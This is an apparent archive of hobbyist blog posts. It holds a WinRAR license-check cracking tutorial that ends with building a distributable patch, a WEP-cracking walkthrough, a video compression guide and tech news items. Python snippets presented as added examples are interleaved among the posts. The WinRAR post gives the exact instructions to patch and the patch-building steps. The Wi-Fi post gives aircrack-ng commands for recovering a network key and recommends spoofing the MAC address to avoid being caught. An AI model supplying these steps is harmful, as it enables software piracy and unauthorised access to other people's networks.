An Introduction to Reverse Engineering - Reversing WinRAR step by step

Hi folks, it's been a long time since I have posted something technical, so I will be writing about the challenge I got at NITLearn to crack any version of WinRAR – An Introduction to cracking KU, where I reverse engineered WinRAR 3.80 using a disassembler, and I will walk you through the same here. Most major software is analysed the same way; the methodology just gets a bit more complex. This tutorial is intended for those who are new to reverse engineering and disassembling.

Disclaimer – By Reading this tutorial You agree that this tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this tutorial.
In any case you disagree with the above statement,stop here.
The Tools
To perform this hack you will need:
  1. Any disassembler (I use Hackers Disassembler and Hview)
  2. Resource Hacker
  3. A patch creator (use Universal Patch Creator or Code Fusion)
You can find all of them by googling.

How to Reverse Engineer?
You need a bit of knowledge of assembly language; in case you don't have it, just cram the steps and it will work anytime, every time. Download the latest version of WinRAR from their website and install it.
I will be cracking WinRAR 3.80 here (because I already have it :P). This is basically a 2 step process (4 steps, if you want to do things with a professional touch).
Screenshot: Install WinRAR.
Now copy the WinRAR.exe file to the desktop. Make a copy of it there.

Step 1 – Hunting for Memory Address
Now launch Hackers Disassembler and load the copy in it.

Screenshot: Open Hackers Disassembler and load the copy of WinRAR in it.

The disassembler will turn the executable into assembly code. Now you need to search for the strings used in the WinRAR program. Press Ctrl + F, type “evaluation” without quotes, and hit Enter to search the assembly code.

Screenshot: Reach this block of code using the search function.

After you have reached this block of code by searching, look at the block of code just above it. There you will find that some values are being compared and then execution jumps to some other function. Now look carefully: the “evaluation copy” function must be invoked after some specific condition is met. We need to find that condition in the code and then change it so that the program doesn't check for it.

Screenshot: We need to edit this code, but first note the memory address.
In the above code you can see this code -
00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12
This is the code responsible for validating you as a legal user :) . Just note down the memory address of the instruction that jumps (JNE) to some other memory location. In this case, note down 00444B71.
Note: For any WinRAR version, this code and memory address might be different, but the JNE will be the same. Just note down the respective memory address of that check.
Now you need to search for the code that brings up that ugly nag screen, “Please purchase WinRAR license”, after your trial period of 40 days is over. For this, look at your toolbar and click on “D”, which stands for Dialog references.
Screenshot: Hit the D in the toolbar.

Now in the dialog box that opens,search for “please” and you will get the reference as -
ID-REMINDER, “Please purchase WinRAR license”
Screenshot: Search in dialog references.

Double click on it and you will reach the subsequent code.

Screenshot: Note down the location of the REMINDER dialog code.
The code will be something like
* String: “REMINDER”
0048731A: 68EB5E4B00 push 004B5EEB
Just note the memory address that invokes the REMINDER dialog. In this case it's 0048731A. Note it down.
Note: For any WinRAR version, this code and memory address might be different, but the REMINDER code will always PUSH something. Just note down the respective memory address that does the PUSH.
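To see how the disassembler arrives at the two lines in Step 1 and at the REMINDER push, here is a small added example (my code, not the author's) that decodes those three byte sequences by hand. The point a beginner usually misses is that the JNE target is not stored in the bytes: 0F 85 is followed by a 32-bit displacement (9B 00 00 00) that is added to the address of the *next* instruction, which is why the listing shows 00444C12. The addresses and bytes are exactly the ones quoted in the post; the decoder handles only those three encodings and everything else about it is an assumption of mine.

```python
import struct

# The three disassembly lines quoted in the post (WinRAR 3.80), as address -> raw bytes:
#   00444B6A: 803DF4B84B0000  cmp byte ptr [004BB8F4], 00
#   00444B71: 0F859B000000    JNE 00444C12
#   0048731A: 68EB5E4B00      push 004B5EEB
LISTING = {
    0x00444B6A: bytes.fromhex("803DF4B84B0000"),
    0x00444B71: bytes.fromhex("0F859B000000"),
    0x0048731A: bytes.fromhex("68EB5E4B00"),
}


def decode(address: int, code: bytes) -> str:
    """Decode one 32-bit x86 instruction of the three forms used in the post.

    Only CMP byte ptr [disp32], imm8 / JNE rel32 / PUSH imm32 are handled;
    any other encoding raises ValueError rather than guessing.
    """
    if code[:2] == b"\x80\x3d" and len(code) == 7:
        # 80 /7 ib with ModRM 0x3D: CMP r/m8, imm8 where r/m is an absolute disp32.
        # The 4 address bytes are little-endian: F4 B8 4B 00 -> 0x004BB8F4.
        disp = struct.unpack_from("<I", code, 2)[0]
        imm = code[6]
        return f"cmp byte ptr [{disp:08X}], {imm:02X}"
    if code[:2] == b"\x0f\x85" and len(code) == 6:
        # 0F 85 cd: JNE rel32. The displacement is signed and relative to the
        # end of this 6-byte instruction, so target = address + 6 + rel.
        rel = struct.unpack_from("<i", code, 2)[0]
        target = (address + len(code) + rel) & 0xFFFFFFFF
        return f"jne {target:08X}"
    if code[0] == 0x68 and len(code) == 5:
        # 68 id: PUSH imm32, again little-endian: EB 5E 4B 00 -> 0x004B5EEB.
        imm = struct.unpack_from("<I", code, 1)[0]
        return f"push {imm:08X}"
    raise ValueError(f"unsupported encoding at {address:08X}: {code.hex()}")


def decode_listing(listing: dict) -> dict:
    """Decode every entry of an address -> bytes mapping."""
    return {addr: decode(addr, code) for addr, code in listing.items()}


if __name__ == "__main__":
    for addr, text in decode_listing(LISTING).items():
        print(f"{addr:08X}: {LISTING[addr].hex().upper():<16} {text}")
```

Running it reproduces the three mnemonics from the screenshots, which is a handy sanity check later when the hex editor shows you bytes without mnemonics and you want to be sure you are looking at the right instruction.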


Step 2 – Fixing and Patching
Now in this step we will be patching the values at the memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hackers Disassembler into Hview.

Screenshot: Open HVIEW and open the EXE in it.

After you have loaded it, you will see that the code is unreadable; it's just like opening an EXE file in Notepad. You need to decode it. To do that, just press F4 and you will get an option to decode it. Hit DECODE and you will be able to see the code as assembly instructions and memory addresses.

Screenshot: Decode the code by pressing F4.

After you have done that, you need to search for the memory addresses you noted down earlier. Just hit F5 and a search box will appear. Now you need to enter the memory address. To do that, enter a “.” and then type the memory address without the leading “00”; the “.” stands in for the “00”, i.e.
Type .444B71 in place of 00444B71
Screenshot: Search using F5.

and search in the code.

Screenshot: Reach the code.

After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code. Now make the following changes -

Screenshot: Change the values.

After you have done it, save it by pressing F9.
Now search for the next memory location by pressing F5 and entering it. Reach it and make the following changes by pressing F3 -

Screenshot: Offset patching.

Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats, you have cracked WinRAR :) Replace the original WinRAR.exe with this copyofwinrar.exe by renaming it. It will work 100% fine :P

Step 3 – Spicing up the EXE
Now that you have a 100% working EXE, you might want to change the registration information shown in WinRAR. To do this, you can use Resource Hacker.

Screenshot: We need to change the registration info.

Launch Resource Hacker and load copyofwinrar.exe in it.

Screenshot: Use Resource Hacker and open the file.

Now go to DIALOG –> expand the tree –> ABOUTRARDLG and click it. Now find the Trial copy line and replace it with your favourite one :P

Screenshot: Make the changes and compile them.

and click on Compile Script button.

Screenshot: Yup, that's the final result.

Now save the file under any name on your desktop or any other location.

Screenshot: Save your EXE.

Now you have a fully patched WinRAR.exe file :)) . If you also want to learn how to turn this into a distributable patch, move on to the next step.

Step 4 – Creating a working Patch (or giving it a professional touch :P)
I will be using diablo2oo2's Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version, just like the ones you have downloaded at some point in your life from Crack and Keygen websites.
Launch the Patch Creator and click on Add New Project. Enter the project information and click on Save.

Screenshot: Launch the patcher and set it up.

Click on Add –> Offset patch


Screenshot: Create the offset patch.

After you have done that, double click on the offset patch and then
  1. Give the path of the original WinRAR.exe
  2. Give the path of the unmodified WinRAR.exe (again)
  3. Give the path of the fully patched WinRAR.exe (i.e. the cracked WinRAR.exe in this case)
  4. Click on Compare and it will show the differences between both files
  5. Click on Save.
Screenshot: Compare executables.
Now in the next window, click on Create Patch and save it. The patch will be created. Now copy it into the WinRAR installation directory and hit Patch; it WILL work.

Screenshot: Create your patch.

Congrats, you have created a patch of your own and have learned to reverse engineer WinRAR :)

Screenshot: Run the patch and it will work :)

You can crack other software in the same way… just practice, debug and disassemble and you will get the hang of it :)
[PS: The above is the long way to do it; I will be telling you the shortest way to crack WinRAR in just 1 step later. The main aim of this tutorial was to introduce you to disassemblers and tools, and to get your hands dirty.]
Cheers
XERO





Winners at NIT KU

Hi Folks, as I already told you, I was taking part in the Loophole event at NIT KU at their technical fest Literati 2010, and I was awarded the first prize at the event. Loophole was a 16 hour workshop on computer security conducted by Kyrion Technologies and NIT KU, and in between they held a software cracking event. The challenge was to turn WinRAR 3.80 from an evaluation version into a full version (which I will be covering soon on my blog). I was able to crack it and was announced the winner of the event :) (I will be throwing a big party in my room). I will also be taking part in the Cyberbytes event, the crossword puzzle and the web trivia event. You guys can catch me there on 29 Jan 2010 for my presentation on computer security.
In the mean time you can enjoy some pics at NIT :P
Photo: NIT KU – Institute of National Importance
Photo: Me at their Civil Engineering Lab
Photo: The Workshop at Jubilee Hall
Photo: One of the hacks in progress
Photo: Waking (and waiting) up late at night :P
Photo: The Fountains at the Bridge of Knowledge

See you folks soon…

PS : Like this article ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

POSTED BY XERO ALL RIGHTS RESERVED.

Heading towards NIT-KU

Hi Folks..wanna meet me ? I will be heading towards Literati 2010 at NIT KU on 23 – 24 Jan and will be presenting my whitepaper on computer security on 29 Jan 2010. See you guys there :) Cuz of this event I have been quite busy with the preparations,but I bet it will pay off.

Cheers .

- Rishabh Dangwal

Compress Videos to smallest size

Okay... A video is nothing but a sequence of still images shown in quick succession so that they appear to be moving. Frame rate is the number of still pictures per unit of time of video: the PAL (Europe, Asia, Australia, etc.) and SECAM (France, Russia, parts of Africa, etc.) standards specify 25 frames/s, while NTSC (USA, Canada, Japan, etc.) specifies 29.97 frames/s. The minimum frame rate to achieve the illusion of a moving image is about 15 frames per second; below that the video will be too jerky.
TERMINOLOGY 

  • BITRATE/Datarate - The parameter that governs video quality: higher bitrate, greater size and great quality. The reverse is ALSO true!
  • FPS - Nope, it's not FIRST PERSON SHOOTER (sorry gamers :P). It's frames per second. Simply changing from 30 fps to 24 fps could result in as much as a 20 percent file size reduction! It's better to choose a slightly lower, 'round-number' frame rate in most cases, such as 24.0 or 25.0.
  • CBR - Constant Bitrate. Every second of audio/video gets the same number of bits, so quality is lower than VBR at the same file size. It is used for streaming purposes.
  • VBR - Variable Bitrate. Bits are spent where the content needs them, which leads to high quality audio/video with a smaller file size.
  • MP1/2/4 or MPEG1/MPEG2/MPEG4 - Video formats developed by the Motion Pictures Experts Group, hence the name. MPEG1 was the first in the series, allowing for video playback. MPEG2 allows DVD quality and MPEG4 aims at streaming internet media and high compression.
  • AVI - Audio Video Interleaved. One of the oldest formats available, it lives on in new incarnations as DIVX and XVID. It's a container in which other compression/encoding methods are worked out.
  • High Definition - Very high bitrate media used for home/personal viewing.

FORMATS


Due to the popularization of video, a flurry of video formats has flooded the market. Still, the most popular ones remain WMV, AVI, MPEG1/2/4, DIVX, XVID, H.264, FLV, RMV, QuickTime and more...
Audio formats include MPEG3, Ogg, AC3, WMA, WAV, RM and many more.
Then come DVD and High Definition media, encoded at a much higher bitrate.

TOOLS

The list is long, and you might not want every one of them :) To get them, just Google the name; they are widely recognized.
WARNING
=======

[VIDEO ENCODERS/DECODERS ARE SYSTEM/MEMORY HOGS !!! SINCE IT IS A VERY INTENSIVE AND TIME CONSUMING PROCESS, YOU MIGHT WANT TO FINISH IT ASAP]
  • NERO - Available like booze and (almost) free. Make it Enterprise (if you haven't already) and use NERO VISION to squeeze it out. Also supports editing.
  • Avid - Professionals use it... nice interface, but still costly. Supports editing.
  • IMTOO MPEG ENCODER - Terrific performance, supports an exhaustive list of formats. Noobs and newbies, do yourself a favour and just stick to it. It will deliver almost everything you want (except editing).
  • FFDSHOW - A collection of codecs. Use the command line (if you like) to encode videos, or just watch/decode videos using it. It comes free with the K-Lite Mega Codec Pack :)
  • VIRTUAL DUB - Free, fantastic and supports everything. But you might need to brainstorm a bit to use it. Supports editing and a lot of stuff !! Highly recommended for geeks.
  • AC3DEC - Used to decode AC3 audio files. Most DVDs use this audio compression method. Get its GUI program to get the best out of it.
  • FLASKMPEG - Used to rip DVDs... well, you have plenty of choices out there...

COMPRESSION

"SPEED VS QUALITY"
Compress using any format you want; full frames of even a 10 minute footage will eat up a lot of disk space on your PC. So, some of the optimisation measures you can take to compress videos -
  • Choose a good codec like DIVX/XVID, MPEG4 or WMV.
  • When aiming for MAXIMUM compression with MINIMUM quality loss, just choosing the compressor is NOT ENOUGH: tweak the bitrate accordingly (lower for low quality and small file size, higher for more quality and a LARGE file size).
  • If a larger video is shrunk to 320x240 or a similar size, the quality will be MUCH HIGHER than by simply capturing the same video at 320x240. Shrinking the frame size from, say, 640x480 to 320x240 will often give about the same picture quality as the original 640x480 video, but the new 320x240 file will probably be much, much smaller.
  • Crop the video to get a small frame size.
  • Use low bitrate audio to get a small video.
  • USE NO AUDIO for silent tutorials.
  • Frame rate can drastically affect file size.
My settings for internet publishing/mobile phones (low end net connection) -
  • CODEC - MPEG4
  • VIDEO BITRATE - 128/160 KBPS
  • AUDIO BITRATE (if any) - 32/48/64 KBPS
  • FRAME RATE - 15/24/25/30 FPS (take your pick :P)
  • VIDEO SIZE - 320 X 240 for internet, 176 X 144 for mobile phones
I use SNAG-IT 8 as my screen capture program.

DVD-RIP



FOR COMPRESSING 4 GB VIDEO MOVIE [Assuming you have .VOB files ready]


Section A for NOOBS


TOOL USED- IMTOO MPEG ENCODER
  1. Open IMTOO.
  2. Select the movie file.
  3. Select the video size from the menu. For DVD quality, choose 720 X 480.
  4. Set the bitrate to 700-900 KBPS.
  5. Set the frame rate to 25 FPS.
  6. Set the aspect ratio as you wish.
  7. Set the audio codec to MP3 and the audio bitrate to 160 KBPS/192 KBPS.
  8. Set the audio sample rate to 44100 Hz.
  9. Hit Encode and leave the PC alone while it encodes the file.
Section B for GEEKS OUT THERE :D


TOOL USED - VIRTUAL DUB,AC3DEC,FLASKMPEG
*PLACE ALL .VOB FILES IN THE SAME FOLDER!
[1]. Open FlaskMPEG to convert the VOB video files: select the video file and choose the codec (compressor/decompressor) you want to use, which will generally be DivX. DIVX LOW MOTION is best for almost all movies, including those which have NO ACTION; Fast-Motion is only good when almost the entire movie is very fast paced, like Terminator 2 or Final Fantasy - Advent Children... you get the idea. Set the bitrate to 900 KBPS and the frame rate to 24/25 fps, choose the output location, set the process priority to high, hit Encode and STAY AWAY FROM YOUR PC !!! After a looooooong time, you will have a single AVI file.
[2]. Put AC3DEC.exe in your VOB file folder, run the command prompt, and type -
ac3dec [FILENAME1.VOB] -allvobs -out [filename2.WAV]
NOTE -
* ac3dec is the name of the application being run -- you can also write "ac3dec.exe", with the identical effect
* FILENAME1 is the name of the first .vob file -- in this case 'vts_01_1'
* FILENAME2 is the name of the .wav file you are going to create -- you chose 'MI3Sound'
* -allvobs means to include all .vob files in the folder sequentially (as a single logical file)
* -out means you want to specify the name and path of the output file
Using the example above you will type this in prompt:
C:\MI3> ac3dec vts_01_1.vob -allvobs -out c:\windows\desktop\MI3.wav
Press Enter and the saving process will begin. After it finishes,close command prompt.You will have a file named MI3.wav on your desktop (approx 1GB).

[PS: GUI VERSION OWNERS WILL HAVE LESS HASSLES..BUT AFTER ALL THIS SECTION IS FOR GEEKS :P]
[3]. open Virtual Dub and select Movie File.Choose "Direct Stream Copy" from VIDEO menu.
[4]. Open the audio WAV file which was created by going to the AUDIO menu, and choosing "Use WAV file". Select the .wav file. Choose "Full Processing Mode" under Audio menu.
[5]. Then Choose "Compressor", choose the MP3 codec,Set Audio quality to 160 KBPS for high quality and 192 KBPS for Very High quality audio.
[6]. Then set 24.000 or 25.000 FPS from Frame rate option in video menu.
[7]. Choose "FILTERS" in the VIDEO menu and Add filters you want one at a time (if you wish).Configure it and use it accordingly.
[8]. Hit encode and in 25 to 50 minutes you will have your rip ready :)

NOTE: You can test how good the compression is so far by compressing the resulting video file into a RAR file. Two cases arise then -
  1. If there is less than 5% compression, the compression is probably about as good as it will get.
  2. If there is more than 5% compression, the audio and/or video can probably be compressed even further. H.264 or XVID/DIVX are your best bets for the smallest file size at any given quality. Just keep in mind that each has various quality settings that affect the compression, and thus the output size. You could use the same program to convert to each, but if the default settings are different, your output file size comparison would be skewed.
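The 5% rule of thumb above, turned into a script as an added example (my code, not from the original post): run the output file through a general-purpose compressor and report how much it shrank. zlib stands in for RAR here (an assumption; both are general-purpose compressors, so the rule applies the same way), and the two sample inputs are constructed: random bytes as a stand-in for a well-encoded video, which no general compressor can shrink, and a block of zeros as a stand-in for a badly padded one.

```python
import os
import zlib

# Constructed stand-ins for real files. A properly encoded video is close to random
# noise to a general-purpose compressor; a padded or poorly encoded one is not.
WELL_ENCODED_SAMPLE = os.urandom(64 * 1024)
POORLY_ENCODED_SAMPLE = bytes(64 * 1024)

THRESHOLD = 0.05  # the post's 5% cut-off


def compression_headroom(data: bytes, threshold: float = THRESHOLD):
    """Return (savings, done) for a blob of already-encoded media.

    savings is the fraction by which zlib (level 9, standing in for RAR) shrank
    the data, clamped at 0 because incompressible input grows by a few header
    bytes. done is True when savings is below the threshold, i.e. the encoder
    has already squeezed out what a general-purpose compressor could find.
    """
    if not data:
        return 0.0, True  # an empty file has nothing left to compress
    packed = zlib.compress(data, 9)
    savings = max(0.0, 1.0 - len(packed) / len(data))
    return savings, savings < threshold


def verdict(data: bytes) -> str:
    """Human-readable version of the post's two cases."""
    savings, done = compression_headroom(data)
    pct = savings * 100
    if done:
        return f"{pct:.1f}% saved: compression is about as good as it will get"
    return f"{pct:.1f}% saved: audio and/or video can probably be compressed further"


def check_file(path: str) -> str:
    """Apply the test to a real file on disk (the RAR step from the post)."""
    with open(path, "rb") as fh:
        return verdict(fh.read())


if __name__ == "__main__":
    print("well encoded  :", verdict(WELL_ENCODED_SAMPLE))
    print("poorly encoded:", verdict(POORLY_ENCODED_SAMPLE))
```

The two answers differ because the threshold is applied to savings, not to the compressed size: a file that comes out a few bytes *larger* under zlib still counts as "done", which is the realistic result for a good H.264 or XVID encode.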

FINDING SOFTWARE

DVD-Ripping software of all kinds can be gotten at www.divx-digest.com
www.download.com for all different kinds of programs


Google Attacked – May Leave China

Google may leave China
A highly targeted attack on Google China and 20 other high profile companies, including Adobe Systems, has led to a major controversy. The attack that hit Google in mid December originated in China and was aimed at obtaining the email credentials of human rights activists advocating for human rights in China, based in Europe, America and China. The attack was discovered as Google uncovered similar attacks on at least 20 other companies in the financial, technology, media, and chemical industries. Adobe Systems issued a separate statement reporting that it and other companies had also come under attack. In light of the revelations, Google said it is considering shutting down its Chinese operations altogether.
"These attacks and the surveillance they have uncovered - combined with the attempts over the past year to further limit free speech on the web - have led us to conclude that we should review the feasibility of our business operations in China," Google's chief legal officer David Drummond commented here. "We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all."
The attack resulted in a breach of 2 email accounts, and the company has stated that no major information was compromised: only the date of account creation and the subject lines, not the content of the emails themselves. The names of the 20 companies have also been withheld. Attacks on Adobe PDF readers and applications that bind malware to them have been on the rise recently, and the timing of Google's warning and Adobe's official statement has led to speculation that some of the attacks may have used Adobe applications or exploits. Google also mentioned in a separate blog post that the companies' servers were not the target.
China has been known for its tightly controlled internet policies, and Chinese hackers have recently gained notoriety alongside Russian ones in the scene. With the rising attacks on major companies, let's see what steps the Silicon Valley giants take to counter them.

Update - Google has rolled out HTTPS access by default in Gmail following the attack on Gmail accounts in China. One more step towards security. You can read more about it here.

Via The Register



Finally I got my PC back

It's been quite long since I was doing my daily rituals, from checking emails to reading technology blogs, on my roommate's laptop, a Compaq Presario V3000. As soon as my exams were over, I hunted the markets for an ideal cheap-and-best combo of motherboard and processor, as my old mobo/processor died in November. Finally one dedicated blog reader, Arun Mishra, suggested a G41 with an Intel Dual Core E5300 for my paltry budget of 6000/- INR, and it hit the spot: I bought an Asrock G41M-VS2 and an Intel E5300 2.6 GHz and fed it with 2 GB of DDR2 RAM. Now my rig is alive and kicking and I had one full day devoted to playing MGS2: Sons of Liberty and RE4 on it. The board supports Pixel Shader 4.0 and will run most modern games, although it WILL suffer from ultra low frame rates, but that's okay with me as it gives me a bit of future proofing; I live in India, where dual core is still the way to go according to the computer vendors here (Core 2 Duo and Quad are a distant possibility in the next 2 years in the lower budget segments... seriously). Furthermore, I just need to try my tools and exploits and blog from this PC, so high performance is not a major factor here.

Photos: Intel E5300; Asrock G41M-VS2

In all... I'm back (I'm feeling like a cliché) to my technoblogging. Also, I will be attending Literati 2010 at NIT-KU and you guys can meet me there :)
Stay gold
XERO


Google Nexus One Launch – Google Jumps Mobile

Google will be announcing its own smartphone and will finally jump into mobile computing officially. The smartphone, named Nexus One, will showcase the latest generation of the Linux-based open source Android operating system and will be marketed directly by Google itself. Designed by HTC, it runs Android OS 2.1, a step up from the older version 2.0.
The Nexus One is powered by a 1 GHz Snapdragon CPU, a 3.7-inch 480 x 800 display, a 5 megapixel camera with LED flash, 512 MB of RAM and an expandable 4 GB microSD card. The 1 GHz processor alone should make the Nexus one of the fastest smartphones currently available, and it will face stiff competition from the offerings of Apple's iPhone, Nokia, Palm and BlackBerry.
Image: Google Nexus One
The Phone will be priced at about
  • 530$ Unlocked and
  • 180$ subsidized with a contract to commit for 2 years.
With Google jumping into the mobile market, the biggest loser is Microsoft, as HTC used to be its flagship company for Windows Mobile phones, and now it isn't. Overall, the Nexus has little to set it apart as a standard or benchmark in the market, given the competitive offerings from other smartphone makers, unless Google baffles us with some nice welcoming tricks up its sleeve.

Via Google Blog.


Spanish Prime Ministers Website Defaced

Visitors to the country's official website were greeted by the slapstick character Mr Bean as the site was defaced by malicious hackers. The representative for Spanish Prime Minister Jose Luis Rodriguez Zapatero confirmed the defacement of www.eu2010.es but insisted that the website itself was never compromised and was left untouched; therefore the act was more or less a stunt.

The act was done using a cross-site scripting attack, which injects custom unauthorized content into vulnerable websites. People who tried to visit the PM's site were briefly met by an image of Mr Bean actor Rowan Atkinson. Comparisons between the appearance of Spain's leader and the buffoon have been a long-standing joke.

Image: Spanish Prime Minister's website defaced

While this hack was relatively harmless, XSS (cross-site scripting) holes can be exploited to inject malicious code into visitors' browsers that steals authentication credentials or redirects victims to malicious websites. The frequency of XSS attacks has increased considerably of late, and they may pose a potential threat to the major websites of the world.
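The root cause of a defacement like this is a page that copies a request parameter straight into its HTML. As an added example (mine, not from the article or the eu2010.es site), the pair of functions below shows the vulnerable pattern next to the fix every web framework applies: escaping the value before it reaches the markup. The injected string is a constructed stand-in for attacker-supplied content, not the payload actually used against the Spanish site, which the article does not reproduce.

```python
import html

# Constructed stand-in for user-controlled input that arrives in a URL parameter.
# The site's own HTML should treat it as text, never as markup.
INJECTED = '<img src="bean.jpg">'


def render_unsafe(title: str) -> str:
    """Vulnerable pattern: the value is concatenated into the page as-is.

    Whatever looks like HTML in `title` is parsed by the browser as HTML, which
    is exactly how a reflected XSS swaps a heading for an image without touching
    anything on the server.
    """
    return "<h1>" + title + "</h1>"


def render_safe(title: str) -> str:
    """Hardened pattern: HTML-escape the value at the point of output.

    html.escape turns <, >, & and (with quote=True) both quote characters into
    entities, so the browser displays the characters instead of interpreting them.
    """
    return "<h1>" + html.escape(title, quote=True) + "</h1>"


def leaks_markup(rendered: str, user_value: str) -> bool:
    """Review check: does the rendered fragment still contain the raw input verbatim?

    True means the value reached the page unescaped. Only meaningful when the
    input contains markup characters, which is why the test data does.
    """
    return user_value in rendered


if __name__ == "__main__":
    for name, fn in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = fn(INJECTED)
        print(f"{name:6}: {out}  -> leaks markup: {leaks_markup(out, INJECTED)}")
```

Escaping at output time, rather than trying to filter "bad" input, is the change that matters: it is independent of what the attacker sends, and it is why the fix is a one-liner rather than a blacklist.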


Hack Wifi using Backtrack

Image: Hacking Wi-Fi using Backtrack

Wi-Fi, or Wireless Fidelity, is the name of a popular wireless networking technology that uses radio waves to provide high-speed Internet and network connections (as if you didn't know...), and it has become an integral part of our lives today. Many Wi-Fi networks are secured using the WEP protocol, which is intended to make wireless LANs as secure as wired LANs by encrypting the data sent over the radio; however, WEP has been found to be far less secure than once believed. Now almost anyone can recover a valid WEP key using Backtrack. Read on to learn how ..

Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information, the blogger cannot be held liable.

SETTING UP THE CARD AND THE CONSOLE

Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -

  • ifconfig

This is the Linux equivalent of ipconfig, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.

  • airmon-ng

This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range

  • airmon-ng stop [Wi-Fi Card name(without the quotes)]

This command will stop the cards broadcast and reception immediately

  • macchanger --mac [Desired MAC address] [Wi-Fi card name]

this command will change the current MAC address to any MAC address you desire, so that you don’t get caught later

  • airmon-ng start [Wi-Fi Card name]

You will see another extra adaptor that is set on monitor mode, use that adaptor for all further purposes in the following commands where – ‘[Wi-Fi card name]’ appears

DUMPING PACKETS

Once you have set up all the parameters,you need to sniff and dump data packets in order to get the key.You can do so by using following commands. On the command console type these commands -

  • airodump-ng [Wi-Fi card name]

Copy and paste the BSSID in the following command and execute it

  • airodump-ng -c [Channel Number] -w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]

As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.
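The same dump can be read from the other side of the table. As an added example (my code, not from this tutorial), the script below parses the CSV text that airodump-ng writes next to its capture and lists every access point still running WEP or no encryption at all, which is the inventory check a network owner should run over their own site. The column layout is the one I know airodump-ng uses (assumed here; check the header of your own file), and the BSSIDs, ESSIDs and timestamps in the sample are made up.

```python
# Constructed sample in the layout of an airodump-ng CSV: an access-point table,
# a blank line, then a station table. All identifiers below are invented.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-01-20 21:10:01, 2010-01-20 21:15:42,  6,  54, WEP , WEP, , -41, 812, 20342, 0. 0. 0. 0, 9, Lab-Guest, 
66:77:88:99:AA:BB, 2010-01-20 21:10:03, 2010-01-20 21:15:40, 11,  54, WPA2, CCMP, PSK, -55, 640, 0, 0. 0. 0. 0, 7, Hostel7, 
CC:DD:EE:FF:00:11, 2010-01-20 21:10:05, 2010-01-20 21:15:39,  1,  54, OPN , , , -70, 300, 0, 0. 0. 0. 0, 8, FreeWifi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2010-01-20 21:11:00, 2010-01-20 21:15:00, -60, 120, 00:11:22:33:44:55, Lab-Guest
"""

# Privacy values that should never appear on a network you are responsible for.
WEAK_PRIVACY = {
    "WEP": "WEP key recovery is routine; migrate to WPA2/WPA3",
    "OPN": "open network, all traffic is readable in the air",
}


def parse_access_points(text: str) -> list:
    """Return one dict per row of the access-point table.

    Reading stops at the blank line that separates APs from the station table.
    Fields are split on commas, so an ESSID containing a comma would be
    mis-parsed; the sample avoids that case.
    """
    rows, header = [], None
    for line in text.splitlines():
        if not line.strip():
            if header is not None:
                break  # end of the AP table
            continue
        fields = [f.strip() for f in line.split(",")]
        if header is None:
            header = fields
            continue
        rows.append(dict(zip(header, fields)))
    return rows


def weak_networks(text: str) -> list:
    """List (BSSID, ESSID, privacy, reason) for every AP with a weak privacy mode."""
    findings = []
    for ap in parse_access_points(text):
        privacy = ap.get("Privacy", "")
        if privacy in WEAK_PRIVACY:
            findings.append((ap["BSSID"], ap["ESSID"], privacy, WEAK_PRIVACY[privacy]))
    return findings


if __name__ == "__main__":
    for bssid, essid, privacy, reason in weak_networks(SAMPLE_CSV):
        print(f"{bssid}  {essid:<12} {privacy:<5} {reason}")
```

Run against a real dump, the same function gives you the list of radios to reconfigure, and the station table it deliberately skips tells you which clients are still associating with them.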

SPEEDING UP THINGS

However, packet dumping is quite a slow process, so we need to speed things up to save time. Open a new console after the first data packet has been stored, type the following command in the new console and execute it:

aireplay-ng -1 0 -a [BSSID] -h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]

As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.

REVEALING WEP KEY

Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.

aircrack-ng -n 64 -b [BSSID] [Filename without the extension]

Screenshot: Revealing the WEP Key.

As you type this command, you will see that a key will appear in front of you in the given below format:

XX:XX:XX:XX

It is not necessary that the key has exactly the same number of digits as shown above, so please don't freak out if you see a 10 digit or 14 digit key. Also, if the decryption fails, you can change the bit level in the command:

aircrack-ng -n [BIT LEVEL] -b [BSSID] [Filename without extension]

Remember, the bit level should be a power of 2, i.e. 2^n where n = 1, 2, 3, 4…

e.g.

aircrack-ng -n 32 -b [BSSID] [Filename without the extension]

OR

aircrack-ng -n 128 -b [BSSID] [Filename without the extension] etc.

Now just login using the WEP key you got.

Cheers

Anonymous author.